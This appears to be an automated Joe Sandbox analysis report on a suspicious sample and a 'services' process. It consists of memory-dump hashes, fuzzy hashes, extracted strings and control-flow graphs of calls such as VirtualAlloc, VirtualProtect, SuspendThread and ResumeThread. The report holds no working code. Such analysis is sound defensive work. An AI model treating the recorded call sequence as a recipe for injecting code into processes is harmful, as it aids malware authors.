                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3b71acf1f619134dacc06a6d2281176aaa09fa432f7e3917ecedb2f6e1ca3ece
                                                                                                                                • Instruction ID: 606a1866a0bd02204dcc55a29eeb21ac350b1ecc61953d7aec989727cda122f0
                                                                                                                                • Opcode Fuzzy Hash: 3b71acf1f619134dacc06a6d2281176aaa09fa432f7e3917ecedb2f6e1ca3ece
                                                                                                                                • Instruction Fuzzy Hash: 31D0C910F0F64F89F23846D14030279169C9F05300E2B003DC05F418FACD2F7B816613
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                • Instruction ID: 7c8e38624d2ef4130053b85e50b9e56239f4f189be2a283211e0ce92d074da92
                                                                                                                                • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                • Instruction Fuzzy Hash: 2BB09200F0E20F83E53000F0047103C00890B84284A620735A50A852E2DC4B3A006351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ccc973479dafff2a15bd748560dc36330f1fba9484759093e3554eba46f06c3
                                                                                                                                • Instruction ID: 4023b18e707feb7a6bc7506c61fa9ccdac22c578f5468be24c985608443ed702
                                                                                                                                • Opcode Fuzzy Hash: 7ccc973479dafff2a15bd748560dc36330f1fba9484759093e3554eba46f06c3
                                                                                                                                • Instruction Fuzzy Hash: C9B01200F3E30B97F33400F4047423C01850B48704E520530D14B851E3DC4D3E002150
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "#0$#+0
                                                                                                                                • API String ID: 0-2817361697
                                                                                                                                • Opcode ID: 2af11a399d91191f5c4a47dc14e754834b7382159047a2ed87576556ab73f3e1
                                                                                                                                • Instruction ID: ca900eee73cf01aad32e69481b4f2a40abba7455f672a9bdf7c512f2d924a6d1
                                                                                                                                • Opcode Fuzzy Hash: 2af11a399d91191f5c4a47dc14e754834b7382159047a2ed87576556ab73f3e1
                                                                                                                                • Instruction Fuzzy Hash: 6251050FB596628CE31532BE71219FC6B41DFD1275B0846B7F15ECD0D74E08688A86E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a347c9e841d8eeea2c1c960ce842025ffe3953d417e36d7caeab6df364540752
                                                                                                                                • Instruction ID: 0f4038f7b1d3a49d85d59b1c0dce087df82a42138d53cebd41c2aa722d74e595
                                                                                                                                • Opcode Fuzzy Hash: a347c9e841d8eeea2c1c960ce842025ffe3953d417e36d7caeab6df364540752
                                                                                                                                • Instruction Fuzzy Hash: 9631F670E18A1DCFCF84DF98D451AEDBBF1FB69300F60116AD419E3291D635A941CB44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: v^^$v^^$Ct^^$St^^$ct^^$u^^$s^^
                                                                                                                                • API String ID: 0-1695519916
                                                                                                                                • Opcode ID: c87a6295ab39d216b5e9a83347de7437afd2782257d2eb463df392ed2e424415
                                                                                                                                • Instruction ID: c5b382548868e572a715d704f6b77ebd1dbc85106116b76d34e3535b924d649f
                                                                                                                                • Opcode Fuzzy Hash: c87a6295ab39d216b5e9a83347de7437afd2782257d2eb463df392ed2e424415
                                                                                                                                • Instruction Fuzzy Hash: D071D817E0E2A64EE722B7BC64714F93FA09F1166870941F7E0DD8E0E3DD09A54A86C5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: t^^$t^^$Ct^^$St^^$ct^^$s^^
                                                                                                                                • API String ID: 0-3522859666
                                                                                                                                • Opcode ID: 1390a66396ed24668a072704d697b283eb7ee88a46ac3f15c566ca5fb7b56564
                                                                                                                                • Instruction ID: 74265795f50093ea300ac54920a1c39a866985f50f6595200e81ff2c9093a0f4
                                                                                                                                • Opcode Fuzzy Hash: 1390a66396ed24668a072704d697b283eb7ee88a46ac3f15c566ca5fb7b56564
                                                                                                                                • Instruction Fuzzy Hash: 48419113D0F3E61EEB1376B824754E93F619F1251870E41F7E0E98E0E3DE0A654A8695
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Ct^^$St^^$ct^^$u^^$s^^
                                                                                                                                • API String ID: 0-2595321845
                                                                                                                                • Opcode ID: 1015141cbb2afef7df034ba55bcb8cace39baa97ae6af732dc52c782c03a0634
                                                                                                                                • Instruction ID: 50986cae52b0a585e991a183918c53b3277740ae7da14b543d8c7d2368bcfec8
                                                                                                                                • Opcode Fuzzy Hash: 1015141cbb2afef7df034ba55bcb8cace39baa97ae6af732dc52c782c03a0634
                                                                                                                                • Instruction Fuzzy Hash: E151DB17E0F2A64EE722B7FC24714F93F609F1262870941F7D0DD8E0E39D0A654686C4

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:6.4%
                                                                                                                                Dynamic/Decrypted Code Coverage:83.3%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:18
                                                                                                                                Total number of Limit Nodes:0
execution_graph
32366 7ffd9b94c744 32367 7ffd9b94c74b ResumeThread 32366->32367 32369 7ffd9b94c854 32367->32369
32382 7ffd9b94af5d 32383 7ffd9b94af6b SuspendThread 32382->32383 32385 7ffd9b94b044 32383->32385
32378 7ffd9b7a295e 32379 7ffd9b7a296d VirtualProtect 32378->32379 32381 7ffd9b7a2aad 32379->32381
32386 7ffd9b94c8a9 32387 7ffd9b94c8b7 CloseHandle 32386->32387 32389 7ffd9b94c994 32387->32389
32374 7ffd9b7a434d 32375 7ffd9b7a436f VirtualAlloc 32374->32375 32377 7ffd9b7a4485 32375->32377
32370 7ffd9b94e525 32371 7ffd9b94e572 GetFileAttributesW 32370->32371 32373 7ffd9b94e605 32371->32373

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ikP.
                                                                                                                                • API String ID: 0-1166349263
                                                                                                                                • Opcode ID: 2ea35fc32cc8a439bca0aa054b98a571ef86ff2ca08a717c427906e9d3625dc3
                                                                                                                                • Instruction ID: 38f0364487cee7abf0e8d42df3ec7c44f39b365626074b230633471e0958f081
                                                                                                                                • Opcode Fuzzy Hash: 2ea35fc32cc8a439bca0aa054b98a571ef86ff2ca08a717c427906e9d3625dc3
                                                                                                                                • Instruction Fuzzy Hash: 53120770E0461D8FDB18DFA8C495AECBBF1FF88340F248669D41AEB255DA34A985CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d6809500c5346ed7c558cd51ebbdcf1d3d0912d3e7b6255a7bf74145f80692c
                                                                                                                                • Instruction ID: a3881586968d0cf45a4ce51652976fe6cbc74ec5eea5e2f6e774c3c5ed7c2469
                                                                                                                                • Opcode Fuzzy Hash: 0d6809500c5346ed7c558cd51ebbdcf1d3d0912d3e7b6255a7bf74145f80692c
                                                                                                                                • Instruction Fuzzy Hash: B8B2C271A0991D8FDFA8EB58C895BA9B7B1FF98301F1042E9D01DD32A5DA356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2bc8d1ef2f1ec4e0bfea14cdb72999e9f7e99698b7f489ef94a95f3a64c43180
                                                                                                                                • Instruction ID: a48b5056d5263d7febed46e673220d768f437e8e32dc916ea625b27473264675
                                                                                                                                • Opcode Fuzzy Hash: 2bc8d1ef2f1ec4e0bfea14cdb72999e9f7e99698b7f489ef94a95f3a64c43180
                                                                                                                                • Instruction Fuzzy Hash: D462E071A19A1D8FDBA8DB58C865BA9B7B1FF98300F1042E9D00DD72A5DE356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e3caa70683f7e98e292e1bbe0d9130f959d7e166d5f2744bded3f4b7654b1ad9
                                                                                                                                • Instruction ID: d0afecccb59b3b3a57f43f99bc9b5e6b71fe5b431762b1776a9d7b0ecd3f7578
                                                                                                                                • Opcode Fuzzy Hash: e3caa70683f7e98e292e1bbe0d9130f959d7e166d5f2744bded3f4b7654b1ad9
                                                                                                                                • Instruction Fuzzy Hash: 8752CE30E1965DCFEB6CCF58C4A4AB87BA1FF58300F1055BDD45AC7296DA39AA81CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3f5d576c1824a2652c002cbac1d9a658d27c96f1263e85cefa34606e4f555ff8
                                                                                                                                • Instruction ID: 544e7306a6141dca6da53e5d5a30b3eb3bc984f00fa1090a5476c924c9319bdb
                                                                                                                                • Opcode Fuzzy Hash: 3f5d576c1824a2652c002cbac1d9a658d27c96f1263e85cefa34606e4f555ff8
                                                                                                                                • Instruction Fuzzy Hash: 0552DF71A09A1D8FDFA8DB58C865BA9B7B1FF98300F1042E9D01DD72A5DA356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b1a3754498cea645dfedcab9c4373eae07d7d2d0282ca8cacb18c971de2d86b7
                                                                                                                                • Instruction ID: 7b327b7d48a67a7853600ea331ae6b6550a47e0391b85dd5300e5b672f027338
                                                                                                                                • Opcode Fuzzy Hash: b1a3754498cea645dfedcab9c4373eae07d7d2d0282ca8cacb18c971de2d86b7
                                                                                                                                • Instruction Fuzzy Hash: 4E42DE71A19A1D8FDFA8DB58C865BA9B7B1FB98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d762afd92c2c03c75cb21f0ace66702a34720303d3bbc8739d0341024f96139b

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 7ffd9b94e525-7ffd9b94e603 GetFileAttributesW 3 7ffd9b94e60b-7ffd9b94e649 0->3 4 7ffd9b94e605 0->4 4->3
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 3188754299-3372436214

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 2962429428-3372436214

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: &$@
                                                                                                                                • API String ID: 0-2538920678

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 98 7ffd9b7a295e-7ffd9b7a296b 99 7ffd9b7a2976-7ffd9b7a2987 98->99 100 7ffd9b7a296d-7ffd9b7a2975 98->100 101 7ffd9b7a2989-7ffd9b7a2991 99->101 102 7ffd9b7a2992-7ffd9b7a2aab VirtualProtect 99->102 100->99 101->102 107 7ffd9b7a2aad 102->107 108 7ffd9b7a2ab3-7ffd9b7a2b03 102->108 107->108
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 111 7ffd9b94c744-7ffd9b94c74a 112 7ffd9b94c74b-7ffd9b94c779 111->112 113 7ffd9b94c77b 112->113 114 7ffd9b94c77c-7ffd9b94c789 112->114 113->114 114->112 115 7ffd9b94c78b-7ffd9b94c852 ResumeThread 114->115 119 7ffd9b94c854 115->119 120 7ffd9b94c85a-7ffd9b94c8a4 115->120 119->120
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 123 7ffd9b94af5d-7ffd9b94af69 124 7ffd9b94af74-7ffd9b94b042 SuspendThread 123->124 125 7ffd9b94af6b-7ffd9b94af73 123->125 128 7ffd9b94b044 124->128 129 7ffd9b94b04a-7ffd9b94b094 124->129 125->124 128->129
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SuspendThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3178671153-0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 132 7ffd9b7a434d-7ffd9b7a4483 VirtualAlloc 137 7ffd9b7a4485 132->137 138 7ffd9b7a448b-7ffd9b7a44ef 132->138 137->138
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B79C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b79c000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: b399400a9882ca2258d1c3307bc8ad04c4d2b7f41be5e72e169e38d5c1ecc594
                                                                                                                                • Instruction ID: e2849ede1594519cc37d0b79eabe9da8755f48b8714eb68ba16b6f23cac5520a
                                                                                                                                • Opcode Fuzzy Hash: b399400a9882ca2258d1c3307bc8ad04c4d2b7f41be5e72e169e38d5c1ecc594
                                                                                                                                • Instruction Fuzzy Hash: 84618031A0964E8FDB68DF58C861AB9B7F1FF58310F10427AD04DD72A2DB356946CB40

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 4ff77dc0dd1ce9712d539f3d37dd4f643f36b17dbc8103559e896143dcd8953d
                                                                                                                                • Instruction ID: 9441958a8635f02c8b2a8938fbffd4e5d3380d378f694794cfbd5da96f470f14
                                                                                                                                • Opcode Fuzzy Hash: 4ff77dc0dd1ce9712d539f3d37dd4f643f36b17dbc8103559e896143dcd8953d
                                                                                                                                • Instruction Fuzzy Hash: 47515975E0960E8FDB69DBD8C4655FDBBB5FF58300F1140BAD01AE72A2DA396A01CB40

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: ed64719e43011d3eeb85109d174a50a066cf70c3443244faf6eb47c1750b066c
                                                                                                                                • Instruction ID: 3b7a0892b2b2e707588ff1685a34f86f2889803cf0cf4f5da5b403bd983df34c
                                                                                                                                • Opcode Fuzzy Hash: ed64719e43011d3eeb85109d174a50a066cf70c3443244faf6eb47c1750b066c
                                                                                                                                • Instruction Fuzzy Hash: A4517D31E1A94E9FDB59CFD8C4605BDB7B1EF44300F1142BED01AE72A2CA3A6A01CB50

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 01a2146bde4736749388a175454dfd7d4ab41f2e1c8272da758d7addea1ea33a
                                                                                                                                • Instruction ID: df9ce7ad9a1d15d805bb2f3e50f90475253f6c105ce27b136e369e84ccbf9d73
                                                                                                                                • Opcode Fuzzy Hash: 01a2146bde4736749388a175454dfd7d4ab41f2e1c8272da758d7addea1ea33a
                                                                                                                                • Instruction Fuzzy Hash: 75514B71E0A54E9FDB69DBD8C4616FCB7B1FF58300F1140BAD41AE7296DA392A05CB40
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DG_H
                                                                                                                                • API String ID: 0-96666378
                                                                                                                                • Opcode ID: 67d71d6fb430c5a4d670364633130aa44568e89478d104e4ce66ff7909269ed6
                                                                                                                                • Instruction ID: 836c0cb4faa0b024aba76d69d601cbee7dc0ce0230d602590f7ec7caddb96733
                                                                                                                                • Opcode Fuzzy Hash: 67d71d6fb430c5a4d670364633130aa44568e89478d104e4ce66ff7909269ed6
                                                                                                                                • Instruction Fuzzy Hash: 38D05EB0E4620E8AEB709B1484983B473A1AB64340F0103B58009931B1CE791AC88B00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e82c820758037d8b1dce2006c8a8953819dc3fa0112038b7beb26f8bd1194c1a
                                                                                                                                • Instruction ID: 6ebe0f7e77361c5028f8e38e3cbb3ca9997ef029f39b619deeb31ffe89bbed2b
                                                                                                                                • Opcode Fuzzy Hash: e82c820758037d8b1dce2006c8a8953819dc3fa0112038b7beb26f8bd1194c1a
                                                                                                                                • Instruction Fuzzy Hash: 7F32623075991C8FDB99EF68D4A8D7573E2EFA8700B1541A9E00BC72B6DE25EC41CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ba97dcece4f5fe439496444713cb61a8a544cfb0629ea21ea35dc51cc81bc0f
                                                                                                                                • Instruction ID: e12474fd737e1145819d44cbd4ce1c8da29514f09677971b6d62551f97902c8a
                                                                                                                                • Opcode Fuzzy Hash: 5ba97dcece4f5fe439496444713cb61a8a544cfb0629ea21ea35dc51cc81bc0f
                                                                                                                                • Instruction Fuzzy Hash: DFE1373060D64D8FD759DF18C855AB9B7E1FF82324F1542AEE04ECB1A2DA36A942CB41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d336c95c0d98bd17d95656f4ef9834ce4b01cbb39051f7ad3d32286774f5855e
                                                                                                                                • Instruction ID: 22041c77fcc0ea130b67a299c9619289cf98bf039e4d58bd726a5f2a08f9dc57
                                                                                                                                • Opcode Fuzzy Hash: d336c95c0d98bd17d95656f4ef9834ce4b01cbb39051f7ad3d32286774f5855e
                                                                                                                                • Instruction Fuzzy Hash: 9EF15371E1965E8FDB98DF58C865BBCB7A2FF98340F4442BAD00DD32A2DA346944CB41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a13418aa344cbca316b55f7d770dbaa5585c70c4eb0ce419930ca801fd4a7f5
                                                                                                                                • Instruction ID: 86ed9134b66702fa647a4e01ceb3ba053409dc1212fcc681c9fc2d635cfc6fcb
                                                                                                                                • Opcode Fuzzy Hash: 4a13418aa344cbca316b55f7d770dbaa5585c70c4eb0ce419930ca801fd4a7f5
                                                                                                                                • Instruction Fuzzy Hash: EEE1F230B0EA4E8FE37ACB9CD4A457977E5FF54310B15057EC08BC36A2DA2AB9428741
                                                                                                                                Memory Dump Source
